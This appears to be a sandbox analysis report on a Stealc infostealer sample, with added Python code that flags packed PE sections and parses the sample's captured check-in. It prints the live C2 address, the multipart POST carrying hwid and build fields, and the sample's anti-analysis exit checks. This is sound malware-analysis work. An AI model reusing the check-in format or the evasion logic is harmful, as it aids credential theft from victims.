Sections (Name / Virtual Address / Virtual Size / Raw Size / MD5 / Xored PE / ZLIB Complexity / File Type / Entropy / Characteristics):
- (unnamed): 0x1000, 0x25b000, 0x22800, 85cd43525bc4c803e27560ab6670b642, unknown, unknown, unknown, unknown, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- .rsrc: 0x25c000, 0x1000, 0x0, d41d8cd98f00b204e9800998ecf8427e, False, 0, empty, 0.0, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- .idata: 0x25d000, 0x1000, 0x200, c60c4959cc8d384ac402730cc6842bb0, False, 0.1328125, data, 0.9064079259880791, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- (unnamed): 0x25e000, 0x2bb000, 0x200, 1e512c31ef3536712b3e2ac2364be61e, unknown, unknown, unknown, unknown, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- fzxkvimr: 0x519000, 0x1af000, 0x1ae400, 9920e2e582323dc8e5295f53ab158ff0, False, 0.9951563407902382, data, 7.9537968539439525, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- ubuokytu: 0x6c8000, 0x1000, 0x400, e7c27197acd12ae1cfeb6993c9ad9f0b, False, 0.763671875, data, 5.949510288292973, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
- .taggant: 0x6c9000, 0x3000, 0x2200, bea2f3a04b4f213dee6d239f7516d4d4, False, 0.0705422794117647, DOS executable (COM), 0.808848242267308, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
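The section table above shows the usual marks of a packed PE: two sections with no name, every executable section also writable, a randomly named section (fzxkvimr) with entropy close to 8, a first section whose virtual size (0x25b000) is many times its raw size (0x22800), and the entry point in .taggant rather than in a code section. Those checks are mechanical, so the following is an added example that automates them; it is not code from the Joe Sandbox report or from the sample. It parses the section table of a PE image directly from the headers and runs the heuristics over a constructed image whose section names and flags are modelled on this report's table (sizes scaled down). The image builder, the thresholds (entropy above 7.0, virtual size above four times raw size) and the finding strings are assumptions of the example.

```python
import hashlib
import math
import struct
from collections import Counter

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    return -sum(c / len(data) * math.log2(c / len(data)) for c in Counter(data).values())


def parse_pe(pe: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "chars": chars, "entropy": shannon_entropy(raw)})
    return {"entry_rva": entry_rva, "sections": sections}


def triage_sections(pe: bytes) -> list:
    """Return [(section name, [findings])]; an empty findings list means the section looks ordinary."""
    info = parse_pe(pe)
    ep = info["entry_rva"]
    out = []
    for s in info["sections"]:
        f = []
        if not s["name"] or not s["name"].isprintable():
            f.append("unnamed or non-printable section name")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            f.append("writable and executable")
        if s["raw_size"] and s["entropy"] > 7.0:
            f.append("high entropy (%.2f)" % s["entropy"])
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["raw_size"] and s["vsize"] > 4 * s["raw_size"]:
            f.append("virtual size far exceeds raw size (room for unpacked code)")
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"]) and s["name"] != ".text":
            f.append("entry point here, outside .text")
        out.append((s["name"], f))
    return out


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (chained SHA-256) standing in for a packed payload."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(specs, entry_rva: int) -> bytes:
    """Assemble a minimal PE32 image from (name, virtual size, raw bytes, characteristics); test input only."""
    opt_size = 0xE0
    hdr_len = (0x40 + 4 + 20 + opt_size + 40 * len(specs) + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    table, body, va, raw_ptr = bytearray(), bytearray(), 0x1000, hdr_len
    for name, vsize, raw, chars in specs:
        padded = raw + b"\0" * (-len(raw) % 0x200)               # FileAlignment 0x200
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va,
                             len(padded), raw_ptr if padded else 0, 0, 0, 0, 0, chars)
        body += padded
        raw_ptr += len(padded)
        va += (max(vsize, len(padded)) + 0xFFF) & ~0xFFF         # SectionAlignment 0x1000
    image = dos + b"PE\0\0" + coff + opt + table
    return bytes(image + b"\0" * (hdr_len - len(image)) + body)


# Constructed image modelled on the report's table: an unnamed RWX section with a large virtual
# size, an ordinary .idata, a randomly named high-entropy RWX section, and .taggant at the entry.
SAMPLE_PE = build_sample_pe([
    (b"", 0x20000, b"\x00" * 0x400, RWX),
    (b".idata", 0x1000, b"kernel32.dll\0lstrcpy\0", RW),
    (b"fzxkvimr", 0x1000, _pseudo_random(0x1000), RWX),
    (b".taggant", 0x3000, b"\xe9" + b"\x00" * 0xFFF, RWX),
], entry_rva=0x23000)                                             # RVA where .taggant is placed
```

Running `triage_sections(SAMPLE_PE)` reports the unnamed section as unnamed, writable+executable and over-allocated, `.idata` as clean, `fzxkvimr` as writable+executable with high entropy, and `.taggant` as the writable+executable section holding the entry point; on the real file the same checks reproduce the "PE file contains section with special chars", "changes PE section rights" and "Entry point lies outside standard sections" signatures from the summary.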
Imports (DLL / Import):
- kernel32.dll: lstrcpy
Suricata IDS alerts (Timestamp / SID / Signature / Severity / Source / Destination / Protocol):
- 2024-10-24T04:01:20.917646+0200; SID 2044243; ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in; severity 1; 192.168.2.5:49723 -> 185.215.113.37:80; TCP
TCP packets (Timestamp / Source / Destination):
- Oct 24, 2024 04:01:19.694441080 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:19.704384089 CEST: 185.215.113.37:80 -> 192.168.2.5:49723
- Oct 24, 2024 04:01:19.704490900 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:19.704643011 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:19.712253094 CEST: 185.215.113.37:80 -> 192.168.2.5:49723
- Oct 24, 2024 04:01:20.623191118 CEST: 185.215.113.37:80 -> 192.168.2.5:49723
- Oct 24, 2024 04:01:20.623332977 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:20.626200914 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:20.631860971 CEST: 185.215.113.37:80 -> 192.168.2.5:49723
- Oct 24, 2024 04:01:20.917566061 CEST: 185.215.113.37:80 -> 192.168.2.5:49723
- Oct 24, 2024 04:01:20.917645931 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
- Oct 24, 2024 04:01:23.155457020 CEST: 192.168.2.5:49723 -> 185.215.113.37:80
DNS answers (Timestamp / Source IP / Dest IP / Trans ID / Reply Code / Name / CName or Address / Type / Class / DNS over HTTPS):
- Oct 24, 2024 04:01:13.768277884 CEST; 1.1.1.1 -> 192.168.2.5; 0x33a6; No error (0); fp2e7a.wpc.2be4.phicdn.net; CNAME (Canonical name) fp2e7a.wpc.phicdn.net; IN (0x0001); DoH: false
- Oct 24, 2024 04:01:13.768277884 CEST; 1.1.1.1 -> 192.168.2.5; 0x33a6; No error (0); fp2e7a.wpc.phicdn.net; A (IP address) 192.229.221.95; IN (0x0001); DoH: false
HTTP sessions with 185.215.113.37 (Session ID / Source / Destination / PID / Process):
- Session 0: 192.168.2.5:49723 -> 185.215.113.37:80; PID 1400; C:\Users\user\Desktop\file.exe
HTTP conversation (Timestamp / Bytes transferred / Direction / Data):

Oct 24, 2024 04:01:19.704643011 CEST, 89 bytes, OUT:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 24, 2024 04:01:20.623191118 CEST, 203 bytes, IN:
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 02:01:20 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 24, 2024 04:01:20.626200914 CEST, 412 bytes, OUT:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 46 35 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes; the body is 211 bytes, matching Content-Length, and carries two form fields, a hardware id "hwid" and a build tag "build"):
------DGHCBAAEHCFIDGDHJEHC
Content-Disposition: form-data; name="hwid"

CCF576CBE6684217651120
------DGHCBAAEHCFIDGDHJEHC
Content-Disposition: form-data; name="build"

doma
------DGHCBAAEHCFIDGDHJEHC--

Oct 24, 2024 04:01:20.917566061 CEST, 210 bytes, IN:
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 02:01:20 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the ASCII string "block"; no further request from the sample follows in the capture, and the process had exited before the analysis timed out)
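The exchange above is the whole of the sample's C2 traffic: an empty GET /, then a multipart POST to /e2b1563c6670f193.php carrying the hwid and build fields, answered with a base64 body. The following is an added example, not code from the report or from the sample, that reconstructs the POST from the logged bytes, parses the multipart body by its declared boundary, checks the framing against Content-Length, and decodes the reply. The request bytes are a constructed reproduction of the capture; treating the pair of hwid and build fields as the check-in shape is an assumption of the example, not a statement of what the Suricata signature matches on.

```python
import base64
import re

# Constructed reproduction of the check-in captured above: the POST to
# /e2b1563c6670f193.php (boundary, hwid and build values as logged) and the reply body.
REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------DGHCBAAEHCFIDGDHJEHC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"CCF576CBE6684217651120\r\n"
    b"------DGHCBAAEHCFIDGDHJEHC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------DGHCBAAEHCFIDGDHJEHC--\r\n"
)
RESPONSE_BODY = b"YmxvY2s="


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.decode("latin-1").partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Extract name -> value from a multipart/form-data body using the boundary in Content-Type."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + match.group(1).encode("ascii")   # "--" + boundary, per RFC 2046
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                        # closing delimiter "--boundary--"
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head.decode("latin-1"))
        if name:
            fields[name.group(1)] = part_body.rstrip(b"\r\n").decode("latin-1")
    return fields


def classify_checkin(raw_request: bytes) -> dict:
    """Pull the check-in fields out of a request and sanity-check its framing."""
    method, path, headers, body = parse_http_request(raw_request)
    fields = parse_multipart(body, headers.get("content-type", ""))
    declared = int(headers.get("content-length", "0"))
    return {
        "path": path,
        "hwid": fields.get("hwid"),
        "build": fields.get("build"),
        "length_ok": declared == len(body),
        # Assumption of this example: a POST carrying both hwid and build is the check-in shape.
        "looks_like_checkin": method == "POST" and {"hwid", "build"}.issubset(fields),
    }


def decode_reply(body: bytes) -> str:
    """The server answers with a base64 body; YmxvY2s= decodes to 'block'."""
    return base64.b64decode(body).decode("ascii")


if __name__ == "__main__":
    print(classify_checkin(REQUEST))
    print("server reply:", decode_reply(RESPONSE_BODY))
```

The same parser can be pointed at a pcap export or proxy log to pull hwid and build values out of other samples talking to the same panel; the hwid is the value to pivot on when correlating infections, and a reply that decodes to "block" is worth recording separately from a reply that carries configuration, since it tells you the panel refused this client rather than that the client failed.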



                            Target ID:0
                            Start time:22:01:15
                            Start date:23/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xde0000
                            File size:1'918'464 bytes
                            MD5 hash:7CEC6EEFC34F3702D47FA5A28CBBB929
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
execution_graph (the node and edge list was flattened by extraction and is truncated at the end of the page; the nodes that carry API names are summarised below in graph order, using the report's own function addresses; "N API calls" is the report's summary of a callee without listing the calls):

- df69f0 -> de2260 -> a chain of de45c0 calls (2 API calls each) through de2274 ... de268e -> df9860
- df9860 -> df9750 GetPEB -> df9868; either df987a -> df988c (21 API calls) or directly -> df9a93 LoadLibraryA x5 -> GetProcAddress at df9af4, df9b16 (x2), df9b4f, df9b71 and df9b92 (x2) -> df6a00
- df6a00 -> dfa740 -> dfa750 -> dfa77e lstrcpy -> df6a0d -> de11d0
- de11d0 -> de11e8: branches to de120f ExitProcess or de1217
- de1217 -> de1160 GetSystemInfo: branches to de117c ExitProcess or de1184
- de1184 -> de1110 GetCurrentProcess, VirtualAllocExNuma: branches to de1141 ExitProcess or de1149 -> de10a0 VirtualAlloc
- de1220 -> df89b0 -> de1249: branches to de1292 ExitProcess or de129a
- de129a -> df6770 GetUserDefaultLangID -> df6792: five separate ExitProcess exits (df67a3, df67ad, df67b7, df67c1, df67cb) or df67d3 -> de1190
- de1190 -> df78e0 (3 API calls) -> de119e -> df7850 (3 API calls) -> de11b7: branches to de11c4 ExitProcess or de11cc
- de11cc -> df7850 GetProcessHeap, RtlAllocateHeap, GetUserNameA -> df6a30 -> df78e0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA -> df6a43 -> dfa9b0
- dfa9b0 -> dfa710 -> dfa9c1 lstrlen -> dfa9e0 -> dfa9fa lstrcpy, lstrcat or dfaa18 -> dfa7a0 -> dfaa24 -> df6a64
- df6a64 -> df6a6b -> df6a72 -> df6a79 -> df6a80 (each step one dfa9b0 call, 4 API calls) -> dfa8a0 (dfa8bb -> dfa8f9 lstrcpy -> dfa90b) -> df6a89
- df6a89: branches to df6b0c or df6ac2 OpenEventA; from OpenEventA either df6ad9 -> df6ae1 CreateEventA -> df6b0c, or df6af5 CloseHandle, Sleep -> df6b0a -> back to df6a89
- df6b0c -> df6920 GetSystemTime -> df6820 -> df698e -> df6998 sscanf -> dfa800 -> df69aa SystemTimeToFileTime, SystemTimeToFileTime -> df69ce: branches to df69d8 ExitProcess or df69e0 -> df5b10
- df5b10 -> df5b1d -> dfa740 lstrcpy -> df5b2e -> dfa820 lstrlen; then dfa820 (2 API calls) at df5b64, df5b74, df5b93, df5ba0, df5bad and df5bf9, with df6430 at df5b74 -> de26a0 -> df5cc3
- df5cc3 -> df6430 lstrcpy -> df5cd5 -> dfa7a0 lstrcpy -> df5cf2, then alternating dfa9b0 (4 API calls) and dfa8a0 lstrcpy through df5d0a, df5d16, df5d3a, df5d46, df5d6a, df5d76 -> dfa740 lstrcpy -> df5d9e -> df7500 GetWindowsDirectoryA
- -> dfa7a0 lstrcpy -> df5db8 -> de4880 -> df5dbe -> df17a0 -> df5dc6 -> dfa740 lstrcpy -> df5de9 -> de1590 lstrcpy -> df5dfd -> de5960 -> df5e03 -> df1050 -> df5e0e
- df5e0e -> dfa740 lstrcpy -> df5e32 -> de1590 lstrcpy -> df5e46 -> de5960 (34 API calls) -> df5e4c -> df0d90 -> df5e57 -> dfa740 lstrcpy -> df5e79 -> de1590 lstrcpy -> df5e8d -> de5960 (34 API calls) -> df5e93 -> df0f40 -> df5e9e -> de1590 lstrcpy (the dump ends here)

The early part of the graph is a sequence of checks that each end in ExitProcess: GetSystemInfo, GetCurrentProcess/VirtualAllocExNuma, GetUserDefaultLangID (with five distinct exit paths), GetUserNameA/GetComputerNameA, and a GetSystemTime/sscanf/SystemTimeToFileTime comparison; only after these does the OpenEventA/CreateEventA step and the string-building and collection code run.
13814->13815 13816 df5eb5 13815->13816 15043 df1a10 13816->15043 13818 df5eba 13819 dfa740 lstrcpy 13818->13819 13820 df5ed6 13819->13820 15387 de4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13820->15387 13822 df5edb 13823 de1590 lstrcpy 13822->13823 13824 df5f5b 13823->13824 15394 df0740 13824->15394 13826 df5f60 13827 dfa740 lstrcpy 13826->13827 13828 df5f86 13827->13828 13829 de1590 lstrcpy 13828->13829 13830 df5f9a 13829->13830 13831 de5960 34 API calls 13830->13831 13832 df5fa0 13831->13832 13926 de45d1 RtlAllocateHeap 13925->13926 13929 de4621 VirtualProtect 13926->13929 13929->13574 13930->13661 13932 de10c2 ctype 13931->13932 13933 de10fd 13932->13933 13934 de10e2 VirtualFree 13932->13934 13933->13691 13934->13933 13936 de1233 GlobalMemoryStatusEx 13935->13936 13936->13694 13937->13718 13939 dfa7c2 13938->13939 13940 dfa7ec 13939->13940 13941 dfa7da lstrcpy 13939->13941 13940->13722 13941->13940 13943 dfa740 lstrcpy 13942->13943 13944 df6833 13943->13944 13945 dfa9b0 4 API calls 13944->13945 13946 df6845 13945->13946 13947 dfa8a0 lstrcpy 13946->13947 13948 df684e 13947->13948 13949 dfa9b0 4 API calls 13948->13949 13950 df6867 13949->13950 13951 dfa8a0 lstrcpy 13950->13951 13952 df6870 13951->13952 13953 dfa9b0 4 API calls 13952->13953 13954 df688a 13953->13954 13955 dfa8a0 lstrcpy 13954->13955 13956 df6893 13955->13956 13957 dfa9b0 4 API calls 13956->13957 13958 df68ac 13957->13958 13959 dfa8a0 lstrcpy 13958->13959 13960 df68b5 13959->13960 13961 dfa9b0 4 API calls 13960->13961 13962 df68cf 13961->13962 13963 dfa8a0 lstrcpy 13962->13963 13964 df68d8 13963->13964 13965 dfa9b0 4 API calls 13964->13965 13966 df68f3 13965->13966 13967 dfa8a0 lstrcpy 13966->13967 13968 df68fc 13967->13968 13969 dfa7a0 lstrcpy 13968->13969 13970 df6910 13969->13970 13970->13730 13972 dfa812 13971->13972 13972->13733 13974 dfa83f 13973->13974 13975 df5b54 13974->13975 13976 dfa87b lstrcpy 13974->13976 13975->13743 13976->13975 13978 dfa8a0 lstrcpy 13977->13978 13979 df6443 
13978->13979 13980 dfa8a0 lstrcpy 13979->13980 13981 df6455 13980->13981 13982 dfa8a0 lstrcpy 13981->13982 13983 df6467 13982->13983 13984 dfa8a0 lstrcpy 13983->13984 13985 df5b86 13984->13985 13985->13749 13987 de45c0 2 API calls 13986->13987 13988 de26b4 13987->13988 13989 de45c0 2 API calls 13988->13989 13990 de26d7 13989->13990 13991 de45c0 2 API calls 13990->13991 13992 de26f0 13991->13992 13993 de45c0 2 API calls 13992->13993 13994 de2709 13993->13994 13995 de45c0 2 API calls 13994->13995 13996 de2736 13995->13996 13997 de45c0 2 API calls 13996->13997 13998 de274f 13997->13998 13999 de45c0 2 API calls 13998->13999 14000 de2768 13999->14000 14001 de45c0 2 API calls 14000->14001 14002 de2795 14001->14002 14003 de45c0 2 API calls 14002->14003 14004 de27ae 14003->14004 14005 de45c0 2 API calls 14004->14005 14006 de27c7 14005->14006 14007 de45c0 2 API calls 14006->14007 14008 de27e0 14007->14008 14009 de45c0 2 API calls 14008->14009 14010 de27f9 14009->14010 14011 de45c0 2 API calls 14010->14011 14012 de2812 14011->14012 14013 de45c0 2 API calls 14012->14013 14014 de282b 14013->14014 14015 de45c0 2 API calls 14014->14015 14016 de2844 14015->14016 14017 de45c0 2 API calls 14016->14017 14018 de285d 14017->14018 14019 de45c0 2 API calls 14018->14019 14020 de2876 14019->14020 14021 de45c0 2 API calls 14020->14021 14022 de288f 14021->14022 14023 de45c0 2 API calls 14022->14023 14024 de28a8 14023->14024 14025 de45c0 2 API calls 14024->14025 14026 de28c1 14025->14026 14027 de45c0 2 API calls 14026->14027 14028 de28da 14027->14028 14029 de45c0 2 API calls 14028->14029 14030 de28f3 14029->14030 14031 de45c0 2 API calls 14030->14031 14032 de290c 14031->14032 14033 de45c0 2 API calls 14032->14033 14034 de2925 14033->14034 14035 de45c0 2 API calls 14034->14035 14036 de293e 14035->14036 14037 de45c0 2 API calls 14036->14037 14038 de2957 14037->14038 14039 de45c0 2 API calls 14038->14039 14040 de2970 14039->14040 14041 de45c0 2 API calls 14040->14041 14042 de2989 14041->14042 
14043 de45c0 2 API calls 14042->14043 14044 de29a2 14043->14044 14045 de45c0 2 API calls 14044->14045 14046 de29bb 14045->14046 14047 de45c0 2 API calls 14046->14047 14048 de29d4 14047->14048 14049 de45c0 2 API calls 14048->14049 14050 de29ed 14049->14050 14051 de45c0 2 API calls 14050->14051 14052 de2a06 14051->14052 14053 de45c0 2 API calls 14052->14053 14054 de2a1f 14053->14054 14055 de45c0 2 API calls 14054->14055 14056 de2a38 14055->14056 14057 de45c0 2 API calls 14056->14057 14058 de2a51 14057->14058 14059 de45c0 2 API calls 14058->14059 14060 de2a6a 14059->14060 14061 de45c0 2 API calls 14060->14061 14062 de2a83 14061->14062 14063 de45c0 2 API calls 14062->14063 14064 de2a9c 14063->14064 14065 de45c0 2 API calls 14064->14065 14066 de2ab5 14065->14066 14067 de45c0 2 API calls 14066->14067 14068 de2ace 14067->14068 14069 de45c0 2 API calls 14068->14069 14070 de2ae7 14069->14070 14071 de45c0 2 API calls 14070->14071 14072 de2b00 14071->14072 14073 de45c0 2 API calls 14072->14073 14074 de2b19 14073->14074 14075 de45c0 2 API calls 14074->14075 14076 de2b32 14075->14076 14077 de45c0 2 API calls 14076->14077 14078 de2b4b 14077->14078 14079 de45c0 2 API calls 14078->14079 14080 de2b64 14079->14080 14081 de45c0 2 API calls 14080->14081 14082 de2b7d 14081->14082 14083 de45c0 2 API calls 14082->14083 14084 de2b96 14083->14084 14085 de45c0 2 API calls 14084->14085 14086 de2baf 14085->14086 14087 de45c0 2 API calls 14086->14087 14088 de2bc8 14087->14088 14089 de45c0 2 API calls 14088->14089 14090 de2be1 14089->14090 14091 de45c0 2 API calls 14090->14091 14092 de2bfa 14091->14092 14093 de45c0 2 API calls 14092->14093 14094 de2c13 14093->14094 14095 de45c0 2 API calls 14094->14095 14096 de2c2c 14095->14096 14097 de45c0 2 API calls 14096->14097 14098 de2c45 14097->14098 14099 de45c0 2 API calls 14098->14099 14100 de2c5e 14099->14100 14101 de45c0 2 API calls 14100->14101 14102 de2c77 14101->14102 14103 de45c0 2 API calls 14102->14103 14104 de2c90 14103->14104 14105 de45c0 2 
API calls 14104->14105 14106 de2ca9 14105->14106 14107 de45c0 2 API calls 14106->14107 14108 de2cc2 14107->14108 14109 de45c0 2 API calls 14108->14109 14110 de2cdb 14109->14110 14111 de45c0 2 API calls 14110->14111 14112 de2cf4 14111->14112 14113 de45c0 2 API calls 14112->14113 14114 de2d0d 14113->14114 14115 de45c0 2 API calls 14114->14115 14116 de2d26 14115->14116 14117 de45c0 2 API calls 14116->14117 14118 de2d3f 14117->14118 14119 de45c0 2 API calls 14118->14119 14120 de2d58 14119->14120 14121 de45c0 2 API calls 14120->14121 14122 de2d71 14121->14122 14123 de45c0 2 API calls 14122->14123 14124 de2d8a 14123->14124 14125 de45c0 2 API calls 14124->14125 14126 de2da3 14125->14126 14127 de45c0 2 API calls 14126->14127 14128 de2dbc 14127->14128 14129 de45c0 2 API calls 14128->14129 14130 de2dd5 14129->14130 14131 de45c0 2 API calls 14130->14131 14132 de2dee 14131->14132 14133 de45c0 2 API calls 14132->14133 14134 de2e07 14133->14134 14135 de45c0 2 API calls 14134->14135 14136 de2e20 14135->14136 14137 de45c0 2 API calls 14136->14137 14138 de2e39 14137->14138 14139 de45c0 2 API calls 14138->14139 14140 de2e52 14139->14140 14141 de45c0 2 API calls 14140->14141 14142 de2e6b 14141->14142 14143 de45c0 2 API calls 14142->14143 14144 de2e84 14143->14144 14145 de45c0 2 API calls 14144->14145 14146 de2e9d 14145->14146 14147 de45c0 2 API calls 14146->14147 14148 de2eb6 14147->14148 14149 de45c0 2 API calls 14148->14149 14150 de2ecf 14149->14150 14151 de45c0 2 API calls 14150->14151 14152 de2ee8 14151->14152 14153 de45c0 2 API calls 14152->14153 14154 de2f01 14153->14154 14155 de45c0 2 API calls 14154->14155 14156 de2f1a 14155->14156 14157 de45c0 2 API calls 14156->14157 14158 de2f33 14157->14158 14159 de45c0 2 API calls 14158->14159 14160 de2f4c 14159->14160 14161 de45c0 2 API calls 14160->14161 14162 de2f65 14161->14162 14163 de45c0 2 API calls 14162->14163 14164 de2f7e 14163->14164 14165 de45c0 2 API calls 14164->14165 14166 de2f97 14165->14166 14167 de45c0 2 API calls 
